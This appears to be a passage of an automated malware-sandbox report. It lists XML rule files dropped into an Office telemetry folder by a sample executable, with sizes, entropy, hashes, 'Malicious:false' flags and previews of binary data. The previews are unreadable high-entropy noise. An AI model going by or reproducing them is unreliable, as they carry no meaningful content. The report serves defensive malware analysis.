                                                                                                                                      Preview:<?xml.}....M-....9.v!.......+.._..;......@...3.H......I.d.b............1hw.2.l......K=.C...N$.o..l....|..z...y.`g....q...l....8I'.a..f.-..gs....F.Y....@=......!TzKH.'.6?.x.uA.................G..H....{.<,...a,....F....k.m..eD....WH.Y....G........-...H..Bb.....V.ol.o>g..b..FS..bw. 4.T.i\.......M....B.Y..._.v(y.B.@..^.+.g.Jv.......9..i!b,.......lo,..e...F.`2../.V...L9.hR;..4Y.....N..u.B.J.MJ...SS..5y....1...L..3.%...0.S..D..b.....H.l.H..<...=.g ..........Q<%..'.t...\.f... s8.`F......o8..C.x...k!He..s.a.F},....r..eK0.@*. \..Y...>..|.h.!..F]............&......R....3=+.G.0..3.*w..zE.....2!.|m'.ea..`...qY.-%E..,.!1P>...X.p..,.*y'.$DI..y}..%..]*Q..-}.U...#....^.@.....g.-..=.....U.......v...+.Y...y.R4......G...'.,..s).....yf.3..,...kT.". .....9....7t+g>...`.2..`.^D....f.......p/6....-...z...7E...L..J.N.\'..p..Y......N.+7H..y..q..4.z....R..%.g...'.MkC.`.......?..T..>/.l.t.O....,o..|./..T.....&'..=ytv..r\..o&g... ..Sh...q.fJv..2H....YMz.WS...4.d=$\

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702401v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1738
                                                                                                                                      Entropy (8bit):7.89791929329343
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:arqpllY1Agn3Jbe52D4HWzS8RhfmSkuu9D:A9ltW2DmpGhfmSM
                                                                                                                                      MD5:917E1AA1C30F7F562CE46EF47223A615
                                                                                                                                      SHA1:88032A646C370BB5F0BF093D1CB700D70DBA1A5D
                                                                                                                                      SHA-256:DACDB7CFD4EA51FC42D6D003C096D9DB00E05C73A15D148DF4863AA3EA7416E8
                                                                                                                                      SHA-512:08A543CA478E0F44F2DFBCEC95207A1D526E28DF366E4C1831EE59BE6E0D95A5124B4B98261787CDA38F4939D157195E045BF1E8084E7B66F5961F70F792C085
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml....._h:.......+oG.....Q.....)/hm.JL..]E.?.U.H7a2.z.../.#^t...g?.[.[.)..g.y..R.....x......s....p..O..~..G!.........'.)........dQ@...bfy...}3....9o......b.........7.dm.....x...0..z..F..".:.B.D....'\](Vw..|....#.....%..bo..W..-.q\>.......h.@.Y........i....b.?.H4N...)@..J....5...Hz..S.f...T(.Wdh......[...3..6{G.z+..1!...j0_v.?v....O.H$..w.&.....A8..jI........4t...X....../..c..P.u.30..!%m.'....0.a.=.c\...8.z..1.k(...Z...[2.....KY..g5........G..."$..3...N..k._.$..l.y...g...Rr..(.......O..ZB...Z...K..S.Ly....S..PDyF...H##.......wd....P..H.R.=..>'e$x.=%'cP)..jbp{vNW|.)@.k....-.n.y.!...$. .?.....I&[..........Rkx.#......%.OK...W`....3....!..;...E...t..sN+....i.fkO.+st..............#CV.6..GQ0.z.Q..!DC..*...H\G.....<.....lz.....e..12A..+zH3......K4].;...<-.c...@....:...I.0....4..)..c.e*s.O..r7..zY..Q...Kk..~^Q.|..3a[.....<t...B.g@l.,..F.....H....L.eH.#.F..a.......u5]x7..Z.o.p.ZV..#t.Z......A&.. ..v......J.+...78`.#.%.7.!.R...m.$....+.

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702450v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1693
                                                                                                                                      Entropy (8bit):7.868334049614395
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:8p1F52VTUO4ME7+MzYtxynq7jSyXs7Yg5g/ZD:8pTmTUzX+Mkyq71Dg5g/R
                                                                                                                                      MD5:5633A687F3A0254B4C67447A1B757E55
                                                                                                                                      SHA1:C6FD0E716536DC0846361B014E2095632F2D4A42
                                                                                                                                      SHA-256:FA0EB9C477A8DED742D7A0125FAF9F4D55C8A28FFFF4A0961C1F9F2D0DA3ACCE
                                                                                                                                      SHA-512:DF385BDA2E4F28ABD3E0058E522B1498E627F51396FDA9CB5D82D42D14EAB0E9E2EBF0602A00194FC5551261D999FCC9B52E1A7498777CF8F176AE9719F152DD
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xmlu..G\...y?.z.E.c\.G...A.*..K.}.]....0"..x...<{?..o....f.5..!..o...>:...."\......tB../k."Dz..!lO.*...G..P.b...iL.^|....x.c.k.....=..5'\7...I.t...U..*op..}..i.yH._2..../..QGT.p..;.'......q6I.#..o.,...z....].@.J.#.....?.]a.......j..Rr16..k.........W..2...@$z.....}.z7...A.3.'...c...QN.$.:.,...O.Q;Z...*.[..`...r]......6....qg.L.avB0.R4J.4L0...X.#.d..*..x..O..(.h.X...UX.?1.)`p.3..\....[2...b..S...i.6..}|%..~...._O...}U..7"..H.......I.FBX...%$...1.lV....N.L.8.B9.s.x.9i.$...'9.z...!._.j8.2A....X-..t.>....`....T*G.q<.qX<..U..=&W.5.q..k.....9.B......l..o.S.j.<..`.x.@.....R..........|.Y.fE.....e.Z.%..;,..f(....U....{...._...E6...LV2......p@-...H. .L:.....c.....@mK..=.;>..f$|.Lx.nuP..A.nq.....,=...=..9.uG../..,UJ..........5.{.uNO...n.....`...D..3!.F.Z..C'.?........V.#IF..Z....X.....,3.GJ..Y....zXx#I..,Q.d.lI.[].....u...M......|..a.{".3c.e..n>...n.....-..u..`.$}OZ..uO.t...z.....cn..R.gy.".F....X..k.:....r.e.r4)1...jc%.E8.@.4..sD..!.m

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702451v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1730
                                                                                                                                      Entropy (8bit):7.89757616705991
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:2EeCkab3H1+TJ1IhvGcAKV7yJWQesljRFKJzAD:nDl3xvGw2JWUtF0zc
                                                                                                                                      MD5:930DCCC86B97020D456723348BF24DDB
                                                                                                                                      SHA1:77BDEB3C3AEDEDC46C4B0789F2F3708C17760AD7
                                                                                                                                      SHA-256:CAD8708753B8F91B8C3710CE4680D6EF1376E74616903F77C1342DC89B7D1366
                                                                                                                                      SHA-512:865613B1BAE28B2738613C3432968BCAD6359FAE47BA8E066297F7F096CE2E189936EFACD091DE7E5114DD4ADE0722FF304A185FC78D1A8772E72561D122A3F1
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml.9..s#...J..L.!".=.._......<.i....N..u5aA....e...;..V_....~GT..Q2.c....2..*j>.......mB.iX.~.Z.n.Y.?.\.Bm.9<.O!m.,}.5(.!z.O.2l[...&6..QfTqz;.6.\...Q....Ll...k.>..BA_eC.5.!....yf.q..B..1......>...d...x..`.U..9...;o..;.7<..4.,..Q.qM.f...Y..]E.:B...d4.J.Qluvbt.C.u..9sIaM-L>5..{.X.c.....].).+..'[/......0C..BO.......8...}...P...*...8.$&....7....o..;.... .\..m.f..i.yo..Nd...=5E...ch'h.@.........fIw..&UG.>p.~.Z;..p..........3.W*.....g).*.|....7..f....../.wq ...<St...P..|....u.H...1*..4A|..r.>.....=....!h.ZL..:...}..:.^n. ...-M.l.D...j$3.>..."S?3.|...$a%.....q..h4...e...4.t..2...N.....D.....C......E)...iS.W.P.....2...-Hy.......L..$..?.I.lJ...h.....2....3....4D...ID.^...9@...%..6Dd..V9.....R.......*..k.h...vF..D...-R1g...+...F..K$....yI.+..DP{e.{.l..[.XIi...t.{.c..FB.0. .o.....hL.s..#..+.<lpS....X...F.....+\<#.v...5...r.$...HI..{D.T..............GaRm.%h.......:...b..q<.^...5..)V.............V....>.=Rx...@,%..(...Q....xN.0.-...|..:....8.c..

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702500v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1711
                                                                                                                                      Entropy (8bit):7.894300171953995
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:7tF6p1aHaQIL2rc3igb3knjJ7CvmDnd7TYLD:ep1HEc3bb3knj1CvmLd7O
                                                                                                                                      MD5:8B40B3019BBD4F44B75290344CF05B0D
                                                                                                                                      SHA1:EA24E64F2071A1C14758C27C7D0582A42CA46E32
                                                                                                                                      SHA-256:7AC13150C6AE288988E738076BC3E4D87AB85A0800582E68A64F52F923CD9E4F
                                                                                                                                      SHA-512:73CE8CD0B886251E787A078DE21E2C39BF4AE13A69CF8AC17DA4F4A60C116E4010E945D5DB90B3CE33C777DEC3AB27EA751338933CB1C68638C68A4D101AD395
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml..u*,9T,}.....E..bu.7VJ.$.../.w..@.B...\..wL.#2.....f:#........p.~>1....'M.x.w..W.s".T>.-E...m..R.o.w*..y.oe...!..Y..A.d`..+.........T...T~<K.1.tY......&. .......T...4....].....B;8q.f..3.....r7...2...j..}D.>M.....:N..^x6.MY ...#..3......G....Q...9.i.F6...QuT.bErw..dM._...x. ..qY.0@..>...@...../).)....eJ.H..}.b.f..L...`a.._....i...N..T#^...?J.....kp......V.P=..+...p.G.ZOt..P.......4W.B....Pb.c..9~\.P).MT........[JN..\.rJ.FB/..6.6[...........K.[V....|..Qf...~./.C.O.P.|....llr(f...D.G.>.C...R.......h..u......(7*..t\<.,..e.+t.K.z.;.|...........?.gF.s....f.q._....O.L....r....0s..n..M?......}...Z....a..c...e.....Z.].i.a..|..F.5.K..$...!.O..%..........~...].?..,..!.h..{..`.Z..a..$......K.....=.Z..J..t....={.-.F..R|F..b...e.u.z....:.'.OA1.x..l.f...].A.s3c6I..9.s....$..z.....FYv..1.117.$S.W.e8.2..bkJ.?.j..rZ..E........R{g.kF......P.9.../.P.x..m.PS..%..q\.!...J<......X[.......S...V...n..~..........p.....o.....~.#......+j.;u.!.F.......o..X..8[..A.;

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702501v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1748
                                                                                                                                      Entropy (8bit):7.881259068530585
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:AQn+Da3Vsp8Vp1inep/lCooPGGSMH9PEkL2YzKhut/Ywk97W9mZwUzC/jdAyuNqX:AQZs+0i/+P9H9MkL2lh4o4IZwUkjdAoD
                                                                                                                                      MD5:AC439AF409041FB4EAFFEF4A8ABC4DA3
                                                                                                                                      SHA1:F00FD01FE92C6AB8A44FA8C6A45072D77DB9A4BE
                                                                                                                                      SHA-256:659EED47065BEFB4A11EC566AF0EAA605B543E30819E2EE5ABF7512096F32E29
                                                                                                                                      SHA-512:EE82B8C797D05847FA254753B50C8CA77AF8836D5C95CD9A5A47834576447741AEAE734A8063775B98766A33224E8D6810E2A87EF637981E95560216C774E23C
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml=\...o5pG.2\3..F....D...>a*...3_..{...Gq.|...O..1. .d..+.?.I..Iy+."..8..w5,d.-.@.hi.,.r>m(.1R..W.i....BW.%E1../...]Q.@.....N.....rA.....}...5.H.......+.w.8.3x.U..[.^......3Drs./a...O.......y0..6J.}!...R.......b.x..W.Q|...Y...d..(..Y<'2Y..).Hfv....mV#.(..4.".}.4..u......~........\....#w ...}q.A.i.gF.n+S...n..C..]/......?...3..N.h.....E..^^!...-G..c.....D..H.isU.......V.g.z.:xIa...X.v+BoV......1.}.".W-.x.....YM...../.`xN^......os8.p.W2X..pB./.P~ct..e...H4.)....%.7.q.P.....>....a..{gfm.=.b...8.1o=.......A..........>../.b.x..!jJ..F....=>.......>.d;&..!.Q.>C2>.F|.02k.....Q6.....B.m.k....g.U..s..7..YGF.7;4f|.|].....T\n....f.&~....4........8....,.(|.r[mI|..n.g...G./..}z1=.V7.....(!.......IL.a..W..P.b...Vm....x.HC.Z.s.z.]6k.....u?)....8C.O....K.$...Q$.....4.oJi....5l.9mX..j>q.`...k..Ub...O..ad....\8...b*:...;....i...5....ts..Z..-.hG.....v..]9W.P.x.r+.].=w...n.}Y....9.]...M%@.....o......1...~WQ.>qc,7.W.9......&..~I....=.2....4;..j..=.F..sP.......

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702550v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1711
                                                                                                                                      Entropy (8bit):7.8807785859067705
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:fdh1kctu8Xa9r+ZtT8EAegyriYwLYoERyGf53HD:fFkck8Xsr+lFFiYoYoEEGpj
                                                                                                                                      MD5:50D1D395A97DF3E6141D838449E664E0
                                                                                                                                      SHA1:E101A9897BDC82AD6D392CE90DA196C772D7EF6E
                                                                                                                                      SHA-256:BF7428073162A3DF8C29C98B79496AE5602BA11EFA34EAAE31EDB9EAE05C0044
                                                                                                                                      SHA-512:9079C0274092DB442AC8109FE772E6920BAF596F69E8BFF6FB7653E9035F90C75BAC22063CD79B5DF22255A628A34CCFA370BCDE78F122CB9BCB8F0AE03BA921
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml.:.w..?....4z".....=Q.(.....,...S....K....?......@.`}...z=.SW.wc..y.Tf.5...6.9... .7..'&....tOK..hE.`b..#.0.....P..@+...~.NgE...Vt.......?...W.L:.\}.->..3..w.c.i.?.x>J.cw.X~.....UV{...H...'...6..b.n.....L.M}.9.a...k1A-At...7...#..q.?..v.s........T..i.5..........>mK_.K.P...[....t..Ed..s......z.Y>.Q7.}...!...qC. ..G...yG..$0z...........O.'......<*.&.$....L...&.....=..4..0:.}..a!.:kz.F.Z..3.uv..0o.R....w...P}..#..-..M.o!vQ2HN.....%.....Q.............`i...~^..p_..D...4..Ak*/.S*...e..\.@g.X.B..]/...Q..>....$.h.....IWv/>U..$.......7...a..3v...J.~:.[..$........Hcs.......P.B...q.V..&g..1....Rx... .Z..jd...N.B...Qu...T.&..s..4..M=..BaKf..B..<.Oz,...=u..0.K.Y.S...1'.o....'...............0.....!.......9.........!..WD!*._..C|..wB.4,...c....(...iKrd>..r.s..M]..E.O.........._..GSQ.^..<H...*x.S.WuY.#T.2.v..u.'.....(.....W....'...]..?_.2.J{5_m.4i..C..,9...eq.G....e.5..s..]...L. 2..~3.*m....D.............R"cIz..IM..=...~N..^..!.tR..]...KS..1._4Y.S/r7......

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702551v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1748
                                                                                                                                      Entropy (8bit):7.873776527299842
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:KdC8egnQQ850AD7WePOcftejkgLoxT7qnD:W6QK0AfXWxox7S
                                                                                                                                      MD5:0B7748F723AAB263204310BFC34017A4
                                                                                                                                      SHA1:1F34D239E3425E86D2F5BC8A0CCFEC0D7526D84C
                                                                                                                                      SHA-256:2512AD7858F0AA95479DA9A9CFA909A3C0B304E2601B2E04516B2840B55AA24D
                                                                                                                                      SHA-512:8327858D2B77E4DB2044DFF767A106D78D0AA80F1E9D547EA80E819193FFF062C4B0BF85B5DF3528241F4B9426E867374532F76FBAE12C07818EDB4A929267CD
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml...J..&........j.5.V&...o.V.fM.2...h)......l..X.`P.3=.4R...A.]p...x..<.`....r..:...d...*...g3....-.s.73...)..#....x....d... ......g..Xb.y.U...8....e.@..........9../..9z.v3].U.|~....bhy....<..].w....W|.&.:.{g.wX..m5.-...l.l.p..(.....K.u.o..iU(,...p...k.TfooX5....l..$....Q..6.......1....o.3../.....*...]....U.PvU.E1Y.J...`.&.J.0.....o.s..(.$.(.".H....\..y...UK-g.W.*|..c,...7.5.DB...|.M.C...1....:....6!*!4.......`c>.M........a#./...Y....:.a.....]U ...N....F.....:0...z.....b..f....'....X..:.}..u...T..x.......QT.xL.......f.Atp....-..s.e.C..d.r...._.....B.......h;.E..B..k......,..M.....g2._p..U...p8.b.Xf.\T+...d.........#.>....w..C.E...=...U..1-.k.R.x.D}]ut.l-........cV..6.....B-.^Pjov.`.#.......\..q..)..]...:,.g...zU...t.Xd..z4T.N.eRl.[u.8......_.W=.J.).7...E..x2.=...i..Z8.o8e.6.W].G..oH...I;..i...b..q..9...V.8..O."..B.y.3.....U5"..dD.C..)..6..6'[i...|..[.M.9.n..@G.Mz....-=.).>.."`7..].>...}hV..!.B#../..>q&...,.......'.]B...q.Xk.3

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702600v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1705
                                                                                                                                      Entropy (8bit):7.890175474651024
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:7u8/e5DqzN3Lbo8K5tBSuW1VO57+gJUXfHZzhAUsG5WKdQRD:RiG3f7K3Q1kRKfHZqZG5WKe
                                                                                                                                      MD5:ACD7B93835A3EDA75D40AE65760AC45A
                                                                                                                                      SHA1:EBFFCAC6C1BB7DB3ED333E7D8306827A136651CD
                                                                                                                                      SHA-256:D8E0340FB9CE074FC9FF7FA7FA61804987EE0DE4675FBCAFCE121D8580FBE0CE
                                                                                                                                      SHA-512:1C3A6005C0A60326FBA5DEB7C3216C6D9A54CF233CBDFE32573F367B47079550C202E6ED14633D14665F23B5F284CA8E2C85ABF7E5178DE2FE7F7EC07BE636B6
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml...I......[.._b.^.<pW..1.O.1..;....%-yM1.'6U.'h.F..a.....Z3..b...v.n..P......HU....f.).7L.U?...{b....1..X.D....,....}M.4...q.K.gB*..v..65..._..i.....2~[...G...Dl..)-8w?<U.{...]IE...E...j.I.hl...#.R>........._..P&....D.*.`\......=;0:...Ot..F,.......Px....."./.&...'.0(.v.$R....&.4H..Q..*......*.$;V..?..t.s.3..O[.\O....1,?_.3.J%.D.O....`'L}.@. ..`....T.+..'.]....\N.I.K....)....=....Y.Y...g.......^N.Z.U.'..=..{q.hf.\N..N.h...@...Y..Z3.C5("c..R.*.Ir..a...._..<.....C.i...`..Wd._.<..S.......n...K:8.>.D....M2.....#...:p_.e..Vc.<..,s"=}.4........V....L..@.[.B..#.O.....Q...8u.N}`kGh3...H./}...&.......K.Pd)..X.|+.e..s.N.../...........zrl....E.}.A..rX..6...r<Oe+..}Y.. .~.M.9JG0.@V.R$......\m.7....J...s7im......|..n}.e..H......y:{.._I...`..y..."6~5X..,.y>..9kf|i..#...E...S.y.z.Zv....F.0...O..0V..#a.......C5..9...&9x...?WL......W.su..'L\xw#L.L.I....'9'#.keW..^...G.?.,Q.?...*....,f..=.........9.-...;h..S....RJp..v..Ou...c...y.q...}.>`/`E.P...fo.K.

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702601v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1742
                                                                                                                                      Entropy (8bit):7.877541472431759
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:tejxGgFFxtpVzUg5ctrTvkBxQ4N82/fx6dWZgNckUfkbTIUI+gsv5BkLB5Cg8j/W:tetGeUeBxw2H8EeNcfi84g27rXt0/D
                                                                                                                                      MD5:1CF996745FF9F355AD30F4BE6E29C4A4
                                                                                                                                      SHA1:72AC6517088E3FD2962B09EEAA676D54EC715DA1
                                                                                                                                      SHA-256:757DC07DEBD7DEC35384C398EA7E1356D67162AEA069C231782994E29D8F9643
                                                                                                                                      SHA-512:92F4097EE8B2347264003A91E3BD142D3BC9B1B36FDFD849BBE32451A49C69304585CE1EE4DCD1C3484BD54EA4D053BDD41F1AAB959CECA0145AD94E21E98BD8
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml.....&.....\........:@._.Y.Z\.\..tL).".B0..[b..<.Rw+..._1.V.|0..T?..Z.f..6....:j.vF...^C..........Wre..5.3...P......h....zn..R.|c.5....R.3.ut...K....p;.2T.Y..I.H./....T>.}6....J..g.#f..".M....E...Q..kOj..O...X`bs...Q.. ....:...z.?.k.`?$...d.l1..WJr....im...F........`.6U.c...MM.q8M.. ..>...*.$... -.....5...v.........]\.....h\.z.D.....m.O.O}....X.y..X..I.......K...c....|p.r..|"..WS.P{...#.L?.G..|...N..:ST......n.DMA.@.].WW..<D6.E....k.....P.>..Jr.PV?...Y.4}T.H.My.....XUF..KV*w..+.F8^.mp....^.2..F..`.I.;...K}r.n\.......?...J.e8q.{.......Y<%..>.x.Ej.'./f.....@y].]..=......+F.8E..[yb..............AU..k${..6^...$..@N...D....(d.n.m.I.L...B...i..$>...vruV)tWl.;Z...;s~...@0...ar....F. .nB.T?B.....Kb.!..h..........-`.J.T{.Urt...:cj.!|.9..r..d..p(.O....<..M...g2M#....t.3..V9BR...DB.ll.1......6m*.J&.#.N/v........(.....z@z..Z."..!..7i.....\.\Ar..].?h.4.%.l.OC..-....g.l..i....f.........z...-=........fFH.2b....^!.HZ.7..d.3...................

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702650v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1691
                                                                                                                                      Entropy (8bit):7.89564610523655
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:o4UxnW8b1Gm1dz6zH9PyAUX+l0POpRhkStA21yKgQatU6Witlk4TNPj2MbD:BIemXWZHLlfpRugA2k3/3n9zD
                                                                                                                                      MD5:42A7B0D466AED5F5A649CBFBA385966D
                                                                                                                                      SHA1:9A531BE0E5E977A0133B58D08C9BBC509456FAA8
                                                                                                                                      SHA-256:144431D405A0C536AB0B30832DA685D90D2F3F5AFFF55C0A707431E4069B99B5
                                                                                                                                      SHA-512:16734E97EE4284CE74CDD0871E93C7B6E2DD19AB0BAAF9C0ADA44A680701D2D4DDD8857F98951C28592DF9071477E18E379C9E66938BC291436953E8127904F9
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml.....{l.K.....o.,]]21(.i2.,.K#~.+..t...l..-.G..:]V}b.........$g.....6..x.l..B....)...x....-....0..... 1.Ba............Y1.!Q[......r..U2Y+SX.L...h......-w.`.....%8Y.........u|..b.QS....E.1}.s...........z.IY ^.z..y..k#..}^.Q....k.R...._...*^L.T....`.G{.d....^..pQ..'...o"k.^]..B1...0?...+}4.gAj....mTA>.h.).5v.K..8..2.....~I..K.j%F.....{Gxn......Q ..r9.....P.#.0+hv.u....^.M!XxtJ".d..c..6....n..s@K......!.m(.n&=....-..3...g7.V.V.l.!..XKP...".X.UqO`...s..G,[.0..*...m.{.%k8.^...p;&...I..2..H....n`v.....=...V.8..e..6F)..=.o.\...*....O...{...h..[..Y....2q.1.D.........h......&.3.H.J.E-.4.......T.>.3..."I...h....Lxx...w.G}v..<K...F......X...V.n..B....Yw.....br,S.$V.;........)..#T...x........[.............J.,;.r.A._....4...P?....VP._........]Nsw..F...U..\|._O].......XK.X~...HK. ..'......E.....*H...m............x_lvl..g.M>.JN[r...or^^...z5CP....R\LP..4....N-^..uW..q:t.?}..Lr{I%..QM*=..e.....p....o.H...S*..:..>S......UW..D.....].

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702651v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1728
                                                                                                                                      Entropy (8bit):7.896256010010518
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:ChNgzZHMMQD+wfnbAh2uYYtdN87WZqMCw40gLKMZD:0NaZTGTvbMflb86woOR
                                                                                                                                      MD5:FF40932B1C340A327F1C2B749E82D8B3
                                                                                                                                      SHA1:F871AC5112357EA574930D97B2ECEDEA6DFFC3E7
                                                                                                                                      SHA-256:C3112CB5E07F20918B1D0CB35B5B4C7E8564CC4F5594CEE6A59E2C16FA7DA7F4
                                                                                                                                      SHA-512:33F16A3A409338E18288C9DD06DB6465EB4355027F1AF9E4D54D9878E75D7C69B5708C87E2EB2FA2FA5E4FAF798B52D75E96296D3EE27E0332C6DAE0DABD3A52
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml|......lxX..!?.-u.d.i.m.A...Q.u.=...{9^.G.l..Vj...W.n._l..Z.."._1..9..?....5..U.H.Ra... .W...f$.'.#k..23..q.H..-....._[%.....m..U.XI..*.j.`..#z?5.?.2..9.-[..[...5|{..9.N.......'...K..E....KA..yTl...wo...-t2u./@.i-o...wX.Dv".u&.MS.. .rH~y...\._...P...}..`.w....K,0..7.........yl.#^%.2....w".........d.....A!u...=.......+.0.1.....}n....0.]w.N..7j.M..Y.((..G.<.K.y.l).6&.H_3..0......K>...vAgZ.e).t.~...`...k.6.a.......(`...Z....f..EK.>@.V.RL....]./.P.`.B.X..../.^....r0Y8.lDgL.L....E..Q0....K..............5}.Z.$:.<....U.._$....p.i......]y.s.YS....fp..1..A...8...#...I.........-...........A...........d..1|...i8Np+s| .....~=@$k../..f....!).V7.......dI.M+Vl......S9&ZF....R. ...w.Q..(g,^..N#....p..|(.a.i.!..b.......W...... <.O@m.....}....XH..)..EX.V.6..("....R.}...+-.znT..@..)y<..v..$W.t'..;..vqd..x.o.i. ..g...6:c"...6.q.9S......#......k.}.........\|c.5N..x...._..Y\...'\......uc....?...XQ)...S...3..P,....y.xR..i.. .r.F.g..&m..T.C....{..iM..ju.m.g...

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702700v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1700
                                                                                                                                      Entropy (8bit):7.874967596661746
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:9lbhLNAdUsK4A2fJ+q5OXgIKt8hENNX4bRdSb5wGd5e3rC8rv5kAstIPcHGtkof3:TbgFK1EpOXgIKseGrC8NvsKPcHGisH1D
                                                                                                                                      MD5:5AEF015E79634A9901680B9AB78825AE
                                                                                                                                      SHA1:F64BB4362CA0C8600E45A3EF5D97BDCC267C2A93
                                                                                                                                      SHA-256:7219D94470918F8E354C82246EDD8ABE89A5CF06874282EB586D243BAF4BD776
                                                                                                                                      SHA-512:9F4FFC73295C56D6DBB208C5C5BB6CE61FFE3D62DCCF768EC9CC19356DEC21D1A2226A86204EAECAAAE4A02DD5DB840225A00E1381DE89D9116A9901525E8CA6
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml.....M.D..N.U$.....F....|..P.(P.0..&..i,xG.#..0,....<+...o\|..f....H...NJNj..W|(.Y.4.Nh...)e.>Y.../?....&.<......M.~-ND8pD6L..qL.d....M.j.j..H-....|1@Q.h..@.....Y#^.'=$.YI6{O7.E...4....)...9.1..U....I..B...d.rfx. .....}.~..b4xF..9...q.r.f..F...9.},....Z.`.r...j..#...>..K.S. %..d.&.,<...@.@.....+...K)0)S.7.........U..m..].yM..@..(...JSL.....B....NTHlx|u.,....j.E.......fX+D.tQ...m.O.?"...@_.4.:...H..-`.K.!..wB[.MO.%c..T.b.*)..R..i....:.....W........@..J.@..qiL.\T....._,.W._.........QK9S../J{...#N....Q8F.H../.@='.x.....w..H...7YE......7...bl]..?.H8.yt+.].5k...9eM..|..:.e...V..../......O.....}F...e..7.I.9..l..C..y.~.yn......~.....E."@a.LB.P...~..B.X..z.(..h....x.....OLW....w.lM.".{..!-.|@e.V.#......jJ.SA....v^..b.~.6|q<.F{a..?.....]..u.....&..r.o...:..I.gl.|...5.....k..^..l..Co.,.?.i....y...........C.J..;.<h..=.H.p#......_K,...)..4B.2>..%[.}).K$......b....k/.}.....+XJ..`..zwt...`....a........I...W.....B.f.".Q.-.X.A}.c..9g".hQ.#I...u'..

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702701v1.xml

                                                                                                                                      Download File
